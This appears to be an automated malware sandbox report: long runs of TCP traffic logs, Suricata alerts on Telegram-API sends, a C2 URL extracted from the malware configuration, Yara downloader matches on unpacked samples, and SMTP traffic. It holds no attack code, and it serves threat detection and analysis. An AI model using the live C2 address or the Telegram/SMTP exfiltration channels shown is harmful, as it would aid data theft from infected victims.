Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711

Source: winword.exe

Memory has grown: Private usage: 1MB later: 66MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49976 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49865 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:50038 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://amazonenviro.com/admin/245_Nsltarpncon

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_0279E7AC InternetCheckConnectionA,

7_2_0279E7AC

Source: global traffic

TCP traffic: 192.168.2.5:49934 -> 46.151.208.21:587

Source: global traffic

